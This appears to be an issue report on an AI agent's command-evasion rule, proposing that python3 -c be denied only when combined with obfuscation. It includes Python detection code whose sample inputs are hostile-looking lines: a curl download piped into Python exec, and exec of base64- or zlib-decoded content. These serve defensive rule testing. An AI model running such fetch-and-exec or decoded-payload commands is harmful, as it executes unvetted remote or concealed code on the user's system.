Problem
The evasion rules block python3 -c '...' as an 'opaque payload', but inline Python is a normal and common pattern in agent workflows.
python3 -c 'import sys, re; ...' → deny: 'python3 -c executes opaque payload'
Fix
Tighten the rule to require obfuscation indicators alongside -c:
- base64 decode patterns (base64 -d, b64decode)
- curl/wget fetching a script to exec
- encoded/compressed payloads
Short, readable inline scripts should be allowed. The rule should detect the combination of -c + obfuscation, not -c alone.
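One way to express the tightened rule, as an added example that is not the project's own rule code: the check fires only when `-c` is combined with at least one obfuscation indicator from the list above. The indicator patterns and the sample commands are constructed for this example.

```python
import re

# Matches `python`, `python3` or `python3.11` followed only by options, then -c,
# so `python3 script.py -c config.ini` is not treated as inline Python.
INLINE_PYTHON = re.compile(r"\bpython[23]?(?:\.\d+)?\s+(?:-\S+\s+)*-c\b")

# Constructed indicator patterns covering the three categories in the issue:
# base64 decoding, fetch-then-exec, and encoded/compressed payloads.
OBFUSCATION_INDICATORS = [
    (re.compile(r"\bbase64\s+(?:-d|--decode)\b"), "shell base64 decode"),
    (re.compile(r"\bb(?:64|32|16)decode\b"), "Python base64 decode"),
    (re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:python[23]?|sh|bash)\b"),
     "fetched script piped to an interpreter"),
    (re.compile(r"\burlopen\("), "script fetched at runtime"),
    (re.compile(r"\b(?:zlib|gzip|bz2|lzma)\.decompress\b|\bgunzip\b|\bgzip\s+-d\b"),
     "compressed payload"),
    (re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"), "long hex-escaped string"),
]


def evaluate(command: str) -> dict:
    """Classify one shell command line as 'allow' or 'deny', with reasons."""
    if not INLINE_PYTHON.search(command):
        # No `python -c` at all: this rule has nothing to say.
        return {"decision": "allow", "reasons": []}
    reasons = [label for pat, label in OBFUSCATION_INDICATORS if pat.search(command)]
    # -c alone is allowed; -c plus an obfuscation indicator is denied.
    return {"decision": "deny" if reasons else "allow", "reasons": reasons}


if __name__ == "__main__":
    # Constructed samples: the first is the readable inline script the issue
    # wants allowed; the others combine -c with an obfuscation indicator.
    samples = [
        "python3 -c 'import sys, re; print(re.sub(r\"\\s+\", \" \", sys.stdin.read()))'",
        "python3 -c 'import base64; exec(base64.b64decode(\"aW1wb3J0IG9z\"))'",
        "curl -s https://example.invalid/p.py | python3 -c 'import sys; exec(sys.stdin.read())'",
        "python3 -c 'import zlib; exec(zlib.decompress(open(\"p.bin\", \"rb\").read()))'",
    ]
    for cmd in samples:
        verdict = evaluate(cmd)
        print(f"{verdict['decision']:5} {verdict['reasons']}  {cmd}")
```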